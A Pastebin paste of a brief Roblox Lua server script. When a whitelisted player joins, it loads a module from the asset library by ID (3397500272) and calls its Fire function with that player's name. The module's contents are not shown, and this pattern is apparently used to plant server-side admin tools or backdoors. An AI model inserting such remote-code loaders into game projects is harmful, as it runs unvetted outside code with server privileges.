Advertisement
MrJupiter

Untitled

Dec 7th, 2019
108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.59 KB | None | 0 0
  1. -- by blazesword2008 (feel free to remove all the notes telling you how to change the script and stuff)
  2.  
  3. local allowed_players = {"name"} -- Replace "name" with your name
  4. -- or for playerid: local allowed_players = {id} -- Replace ID with the numbers of the player's id
  5.  
  6. game.Players.PlayerAdded:Connect(function(player)
  7.  
  8. for i,v in pairs(allowed_players) do
  9.  
  10. if player.Name == v then
  11. -- replace player.Name with player.UserId if your using playerids
  12.  
  13. require(3397500272):Fire(player.Name)
  14.  
  15. end
  16.  
  17. end
  18.  
  19. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement